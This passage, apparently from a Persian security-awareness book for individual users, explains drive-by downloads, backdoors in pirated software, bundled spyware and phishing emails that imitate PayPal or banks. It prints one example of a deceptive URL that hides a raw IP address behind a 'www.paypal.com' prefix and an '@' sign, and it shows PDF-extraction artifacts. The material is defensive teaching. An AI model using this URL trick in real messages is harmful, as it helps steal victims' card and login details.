ﺩﻧﻴﺎ ﻫﻢ ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ ﺑﮕـﺬﺍﺭﺩ.
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺍﮔﺮ ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﻛـﻪ ﺭﻭﻱ ﺩﻳـﺴﻜﻬﺎﻱ
ﺷﻤﺎ ﺍﻣﻜﺎﻥ ﻧﻮﺷﺘﻦ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﺁﻧﮕﺎﻩ ﻣﻬﺎﺟﻢ ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧـﺴﺖ
ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﺷﻜﻞ ﺩﻟﺨﻮﺍﻩ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﺪ.
File Sharing
59
ﻫﺪﺍﻳﺖ ﺑﻮﺳﻴﻠﺔ downloadﻫﺎ
٦٠
"ﻫﺪﺍﻳﺖ ﺑﻮﺳﻴﻠﻪ downloadﻫﺎ" ﺯﻣﺎﻧﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﻪ ﻳﻚ
ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﻣﺮﺍﺟﻌــﻪ ﻣــﻲﻛﻨﻴــﺪ ﻭ ﺑﺮﻧﺎﻣــﻪ HTMLﻣﻮﺟــﻮﺩ ﺩﺭ
ﺻﻔﺤﻪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ Javaﻳـﺎ ActiveXﺭﺍ
ﺩﺭﺧﻮﺍﺳــﺖ ﻣــﻲﻛﻨــﺪ ﻭ ﺁﻥ ﺑﺮﻧﺎﻣــﻪ ﻧﻴــﺰ ﻳــﻚ ﺑﺮﻧﺎﻣــﺔ ﺩﻳﮕــﺮ ﺭﺍ
downloadﻣــﻲﻧﻤﺎﻳــﺪ ،ﺁﻧــﺮﺍ ﺍﺟــﺮﺍ ﻣــﻲﻧﻤﺎﻳــﺪ ،ﻳــﺎ ﻃــﻮﺭﻱ
ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﺘﻮﺍﻧﺪ ﺁﻧـﺮﺍ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ ﺁﻭﺭﺩ.
ﻫﻤﭽﻨﻴﻦ ﻛﺪ HTMLﻣﻲﺗﻮﺍﻧﺪ ﻭﺍﺭﺩ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﮔـﺮﺩﺩ.
ﺍﮔﺮ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ Javaﻳﺎ ActiveXﺑـﺪﻭﻥ ﺍﻳﻨﻜـﻪ ﺍﺯ ﺷـﻤﺎ
ﺍﺟﺎﺯﻩ ﺑﮕﻴﺮﻧﺪ ﻭ ﻳﺎ ﺣﺘﻲ ﺑﻪ ﺷﻤﺎ ﺍﻃﻼﻉ ﺩﻫﻨﺪ ﺍﺟﺎﺯﺓ ﻧﺼﺐ ﻛﺮﺩﻥ
ﺑﺮﻧﺎﻣﻪ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ ،ﺁﻧﮕﺎﻩ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ downloadﺷﻮﻧﺪ ﻭ
ﻫﺮﭼﻪ ﺭﺍ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻧﺼﺐ ﻧﻤﺎﻳﻨﺪ.
ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ
ﻣﻔﻬﻮﻡ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﻣﺴﺮﻭﻗﻪ ﻣﻔﻬﻮﻡ ﺗﺎﺯﻩﺍﻱ ﻧﻴﺴﺖ .ﭼﻨـﺪﻳﻦ
ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﺓ ﺟﻌﻠـﻲ ﻓﺮﻭﺧﺘـﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ
ﻧﺴﺨﻪﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺁﻧﻬﺎ -ﻛﻪ Warezﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ -ﻧﻴﺰ
ﺭﺍﻳﺞ ﻫﺴﺘﻨﺪ .ﺍﺯ ﻣﺪﺗﻬﺎ ﭘﻴﺶ ﺍﻳﻦ ﺳﻮﺀ ﻇﻦ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﻛﻪ ﺍﻳﻦ
ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺣﺎﻭﻱ ﻭﻳﺮﻭﺱ ﺑﺎﺷﻨﺪ ،ﺍﻣﺎ ﺍﺣﺘﻤـﺎﻝ
ﺑﻴﺸﺘﺮﻱ ﻛﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻧﻮﻉ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺗﻌﻤﺪﹰﺍ ﺣﺎﻭﻱ ﻭﺻﻠﻪﺍﻱ ﺑﺎﺷﺪ ﻛﻪ ﻳﻚ ﻓﺮﺩ ﻏﻴﺮ ﻣﺠﺎﺯ ﺭﺍ ﻗﺎﺩﺭ
ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ.
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻧﺼﺐ ﺍﻏﻠﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺑﻪ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻫﺒـﺮﻱ
ﻧﻴــﺎﺯ ﺩﺍﺭﺩ ،ﺍﻳــﻦ ﺭﻭﺵ ﻓﺮﺻــﺖ ﻣﻨﺎﺳــﺒﻲ ﺑــﺮﺍﻱ ﻧــﺼﺐ ﺷــﺪﻥ
ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺷﻤﺎ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻧﻜﺮﺩﻩﺍﻳﺪ ﻓﺮﺍﻫﻢ ﻣﻲﺁﻭﺭﺩ.
ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﭘﻨﻬﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺳﺎﻟﻢ
ﺍﮔﺮﭼﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻛﺜـﺮ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﻛـﻪ download
ﻣﻲﻛﻨﻴﺪ ﺳﺎﻟﻢ ﺑﺎﺷﻨﺪ ،ﺍﻣﺎ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ
downloadﺷﺪﻩ )ﻣﺨﺼﻮﺻﹰﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﺍﻳﮕـﺎﻥ( ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﺩﻳﮕﺮﻱ ﺭﺍ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺷﻤﺎ ﻧﺼﺐ ﻧﻤﺎﻳﺪ .ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺷـﺘﺮﺍﻙ
ﻣﺘﻘﺎﺑﻞ ﻓﺎﻳﻠﻬﺎ ٦١ﺑﺴﻴﺎﺭ ﻣـﺴﺘﻌﺪ ﭼﻨـﻴﻦ ﻭﺿـﻌﻴﺘﻲ ﻫـﺴﺘﻨﺪ .ﺍﻳـﻦ
ﻻ ﺷﺎﻣﻞ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺩﻳﮕـﺮﻱ ﻣـﻲﺑﺎﺷـﻨﺪ ﻛـﻪ
ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻌﻤﻮ ﹰ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﻧﻮﻉ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺩﻳـﺎﺑﻲ ﻭ ﺍﻋﻤـﺎﻝ ﺗﻐﻴﻴـﺮ ﺩﺭ
ﻭﺏ ﻃﺒﻘﻪﺑﻨﺪﻱ ﻣﻲﺷﻮﻧﺪ ﻭ ﮔﺮﺩﺵ ﻭﺏ ﺷﻤﺎ ﺭﺍ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﻨـﺪ،
Drive By Downloads
Peer-to-Peer File Sharing
60
61
٧٧
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺍﻧﻮﺍﻉ ﺗﺒﻠﻴﻐﺎﺕ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭﻣﻲﺁﻭﺭﻧﺪ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺷـﻤﺎ ﺭﺍ ﺑـﻪ
ﻣــﺪﻳﺮ ﺧــﻮﺩ ﮔــﺰﺍﺭﺵ ﻣــﻲﻧﻤﺎﻳﻨــﺪ .ﺑﺮﺧــﻲ ﺍﺯ ﺍﻳــﻦ ﺑﺮﻧﺎﻣــﻪﻫــﺎ
ﺩﺳﻴﺴﻪﺁﻣﻴﺰ ﻫﺴﺘﻨﺪ ،ﺑﺪﻳﻦ ﺻﻮﺭﺕ ﻛﻪ ﺳﻌﻲ ﺩﺍﺭﻧﺪ ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ
ﻛﻨﻨﺪ ﻭ ﺗﻘﺮﻳﺒﹰﺎ ﻏﻴﺮ ﻗﺎﺑﻞ ﺣﺬﻑ ﺑﺎﺷـﻨﺪ .ﭼﻨـﻴﻦ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﺩﺍﺭﺍﻱ
ﻳﻚ ﺍﺑﺰﺍﺭ uninstallﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﺁﻧـﺮﺍ ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ ،ﺁﻥ ﺍﺑـﺰﺍﺭ
uninstallﺭﺍ ﭘﺎﻙ ﻣﻲ ﻛﻨﺪ ،ﻭﻟﻲ ﺑﺮﻧﺎﻣـﺔ ﺍﺻـﻠﻲ ﻫﻨـﻮﺯ ﻭﺟـﻮﺩ
ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺧﻮﺍﻫﺪ ﺁﻣﺪ.
ﻫﻤﺔ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺟﺮﺍ ﻧﻤﻲﺷﻮﻧﺪ .ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﺷﺪﻩ
ﻛﻪ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻳـﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻔﺮﺳـﺘﻨﺪ ﻭ ﺩﺭ ﺁﻥ
ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻪ ﻧﺤﻮﻱ ﺗﺮﻏﻴﺐ ﺑﻪ ﻣـﺸﺎﻫﺪﺓ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻣـﻮﺭﺩ ﻧﻈـﺮ
ﺧﻮﺩ ﻧﻤﺎﻳﻨﺪ .ﺭﻭﺵ ﺳﻨﺘﻲ ﺣﻴﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺑﻪ ﺷﻤﺎ ﭼﻴﺰﻱ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺪﺍﻥ ﻋﻼﻗﻤﻨﺪ ﻫـﺴﺘﻴﺪ ﺍﻣـﺎ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺸﻐﻮﻝ ﻣـﺸﺎﻫﺪﺓ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻣﻌﺮﻓـﻲﺷـﺪﻩ ﻫـﺴﺘﻴﺪ
ﺗﻌﺪﺍﺩﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺣﻤﻠﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﺷﺎﻳﺪ
ﻧﻮﻋﻲ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭ ﺭﺍ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ downloadﻛـﺮﺩﻩ )ﻣـﺸﺎﺑﻪ
"ﻫﺪﺍﻳﺖ ﺑﻮﺳﻴﻠﻪ downloadﻫﺎ"( ﻭ ﻳﺎ ﻋﻤﻠﻴﺎﺕ ﺩﻳﮕﺮﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ.
ﺩﺭ ﺭﻭﺷــﻬﺎﻱ ﺟﺪﻳــﺪﺗﺮ ،ﻧﺎﻣــﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺍﺩﻋــﺎ ﻣــﻲﻛﻨــﺪ ﻛــﻪ
ﺻﻮﺭﺗﺤـــﺴﺎﺑﻲ ﺍﺯ ) eBayﭘﺎﻳﮕـــﺎﻩ ﻭﺏ ﻣﺰﺍﻳـــﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧـــﺖ( ﻳـــﺎ
) PayPalﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﺮﺍﻱ ﭘﺮﺩﺍﺧﺘﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ( ﻭ ﻳـﺎ ﺍﺯ ﻃـﺮﻑ
ﺑﺎﻧﻚ ﺷﻤﺎ ﺍﺳﺖ .ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺴﻴﺎﺭ ﻣﻄﻤﺌﻦ ﺑﻨﻈﺮ ﻣﻲ ﺭﺳﺪ
ﻭ ﺑﻪ ﺷﻤﺎ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺑﻲ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ
ﻻ
ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧـﻮﺩ ﺭﺍ ﺗـﺄﻣﻴﻦ ﺍﻋﺘﺒـﺎﺭ ﻧﻤﺎﻳﻴـﺪ .ﻣﻌﻤـﻮ ﹰ
URLﻫﺎﻳﻲ ﻛﻪ ﺍﻳﻦ ﻧﺎﻣﻪﻫﺎ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﻨﺪ ﻧﻴﺰ ﺑـﺎ URLﻫـﺎﻱ
ﻣﻌﺘﺒــﺮ ﺑــﺴﻴﺎﺭ ﻣــﺸﺎﺑﻬﺖ ﺩﺍﺭﺩ .ﺑﻌﻨــﻮﺍﻥ ﻣﺜــﺎﻝ URLﻭﺍﻗﻌــﻲ
،PayPalﺁﺩﺭﺱ www.paypal.comﺍﺳــﺖ ،ﻭ URLﻱ
ﻛﻪ ﺩﺭ ﻧﺎﻣﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺩﻗﻴﻘﹰﺎ ﻫﻤﺎﻥ ﺁﺩﺭﺱ ﺑﺎﺷﺪ .ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺻـﻔﺤﻪ
ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ URL ،ﻭﺍﻗﻌﻲ ﻧﻴﺴﺖ ﻛﻪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ
ﺁﻥ ﺻﻔﺤﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ URL .ﻭﺍﻗﻌﻲ ﻛﻪ ﺑﻪ
ﻻ ﭘﻨﻬﺎﻥ ﻣﻲﺑﺎﺷﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺼﻮﺭﺕ
ﺁﻥ ﺍﺷﺎﺭﻩ ﺷﺪ ﻣﻌﻤﻮ ﹰ
ﺯﻳﺮ ﺑﺎﺷﺪ:
ﻲ ﺭﺳﻤﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺭﺳـﺎﻝ ﻣـﻲﺷـﻮﺩ
ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ
ﻻ ﺷﺎﻣﻞ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩﻱ ﺍﺳـﺖ ﻛـﻪ ﺍﺯ ﺁﺩﺭﺱ
ﻣﻌﻤﻮ ﹰ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ؛ ﺍﻃﻼﻋﺎﺗﻲ
ﻧﻈﻴﺮ ﻧﺎﻡ ﻛﺎﻣﻞ ﻭ ﻳﺎ ﭼﻬﺎﺭ ﺭﻗﻢ ﺁﺧﺮ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺷـﻤﺎ .ﺍﮔـﺮ
ﺍﻳﻦ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻫﺪﺍﻳﺖ ﻛﻨﺪ ،ﺑﻪ
ﺷﻤﺎ ﺁﺩﺭﺱ ﺁﻧﺮﺍ ﻧﻴﺰ ﺧﻮﺍﻫﺪ ﺩﺍﺩ ،ﺍﻣﺎ ﺩﺭ ﺁﻥ ﻫﻴﭻ ﺍﺭﺗﺒـﺎﻁ ﺻـﻔﺤﻪ
ﻭﺏ ٦٣ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ .ﻫﻤﭽﻨــﻴﻦ ﺻــﻔﺤﺎﺕ ﻭﺏ ﻣﻘــﺼﺪ ﺷــﺎﻣﻞ
ﺍﻃﻼﻋﺎﺗﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﻫـﻴﭻ ﻛﻼﻫﺒـﺮﺩﺍﺭ ﻳـﺎ ﻫﺮﺯﻧﺎﻣـﻪﻧﻮﻳـﺴﻲ
ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺷﺘﻪﺑﺎﺷـﺪ .ﺍﮔـﺮ ﺑـﺎﺯﻫﻢ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺭﺩ
ﺗﺮﺩﻳﺪ ﺩﺍﺷﺘﻴﺪ ،ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳـﻖ
ﺗﻠﻔﻦ )ﻭ ﻧﻪ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ( ﺑﺎ ﺷﺮﻛﺖ ﻣﺮﺑﻮﻃﻪ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﻭ ﺍﺯ
ﺍﺻﺎﻟﺖ ﻧﺎﻣﺔ ﺍﺭﺳﺎﻟﻲ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ.
http://www.paypal.com:user=3245329:transaction
=43293:code=4333033.33@218.5.79.162
Non-Resident Malware
62
Hyperlink
63
ﺑﺨﺶ ﺩﻭﻡ
ﺑﺪﺍﻓﺰﺍﺭﻫﺎﻱ ﻏﻴﺮﻣﺎﻧﺪﮔﺎﺭ
٦٢
ﺍﮔﺮ ﻓﺮﺩﻱ ﺑﺎ ﺭﻳﺰﻩﻛﺎﺭﻳﻬـﺎﻱ ﻗﺎﻟـﺐ URLﺁﺷـﻨﺎ ﻧﺒﺎﺷـﺪ ﺗـﺼﻮﺭ
ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳﻦ ﺁﺩﺭﺱ ﻫﻤﺎﻥ www.paypal.comﺍﺳـﺖ ﻭ
ﻟﺬﺍ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﻧﺒﺎﻳـﺪ ﻛﺎﺭﺍﻛﺘﺮﻫـﺎﻳﻲ
ﻛﻪ ﻗﺒﻞ ﺍﺯ ﻋﻼﻣﺖ @ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ؛ ﺯﻳﺮﺍ ﺍﻳﻦ
ﻻ
URLﺑﻪ ﺁﺩﺭﺱ 218.5.79.162ﻣﺘﺼﻞ ﻣﻲ ﺷـﻮﺩ .ﻣﻌﻤـﻮ ﹰ
ﺩﺭ ﺍﻳــﻦ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﻧﻴــﺰ ﺻــﻔﺤﻪﺍﻱ ﻣــﺸﺎﺑﻪ ﺻــﻔﺤﺔ ﻭﺍﻗﻌــﻲ
PayPalﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﻭ ﺍﺯ ﺷـﻤﺎ ﻣـﻲﺧﻮﺍﻫـﺪ ﻛـﻪ ﻭﺍﺭﺩ ﺁﻥ
ﺷﻮﻳﺪ ﻭ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻴﺪ .ﺩﺭﻭﺍﻗﻊ ﺍﻳـﻦ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻫﺮﮔﺰ ﺑﻪ PayPalﻣﺘﺼﻞ ﻧﻤﻲﺷﻮﺩ ،ﺑﻠﻜـﻪ ﻣﺘﻌﻠـﻖ
ﺑﻪ ﻓﺮﺩﻱ ﺍﺳﺖ ﻛﻪ ﺳﻌﻲ ﺩﺍﺭﺩ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺷﻤﺎ ﻭ ﺍﻃﻼﻋـﺎﺕ
ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﺮﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ .ﺍﻳـﻦ ﺣﻴﻠـﻪﻫـﺎ ﺩﺭ ﻋﻤـﻞ ﺑـﺴﻴﺎﺭ
ﻣﻮﻓﻘﻴﺖ ﺁﻣﻴـﺰ ﺑـﻮﺩﻩﺍﻧـﺪ .ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﻧﺎﻣـﻪﻫـﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺸﺎﺑﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺳﺎﻟﻢ ﻭ ﻣﺸﺮﻭﻉ ﺑﺎﺷﻨﺪ
ﻛﻪ ﻭﺍﻗﻌﹰﺎ ﺍﺯ ﻃﺮﻑ PayPalﺍﺭﺳﺎﻝ ﺷﺪﻩﺍﻧﺪ.
٧٩
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺳﻴﺮ ﺗﻜﺎﻣﻞ
ﻓﺼﻞ ﺷﺸﻢ
ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻭﺏ ﺍﺯ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺍﺻﻠﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻫـﺴﺘﻨﺪ.
ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﻋﻤﻠﻜﺮﺩ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ ﺭﺍ ﺑﻄـﻮﺭ ﺟﺰﺋـﻲ ﺗﻮﺿـﻴﺢ
ﻣﻲﺩﻫﻴﻢ ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﻣﻨﺎﺳﺐ ﺍﺯ ﺁﻧﻬﺎ ﻛـﻪ ﺑﺎﻋـﺚ ﺍﻳﺠـﺎﺩ ﻧـﺎﺍﻣﻨﻲ
ﻣﻲﮔﺮﺩﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻴﻢ .ﻣﻮﺍﺭﺩﻱ ﻣﺜﻞ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑـﻲﺳـﻴﻢ،
ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬﺎ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺍﺯ ﺩﻳﮕﺮ ﻣﻮﺿـﻮﻋﺎﺕ
ﺣﺴﺎﺱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺁﻧﻬﺎ
ﭘﺮﺩﺍﺧﺘﻪ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺍﺻﻮﻝ ﺍﻭﻟﻴﻪ
ﻭﺻﻠﻪ ﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﺑـﺮﺍﻱ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ
ﺧﻮﺩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨـﺪ
ﺑﺎ ﺭﻭﺷﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺑﻪ ﺷـﻤﺎ ﺁﺳـﻴﺐ ﺑﺮﺳـﺎﻧﻨﺪ ،ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺑـﻪ
ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻳﺪ ﺍﺣﺘﻤﺎﻝ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺑﻴﺸﺘﺮ ﻣﻲﮔﺮﺩﺩ.
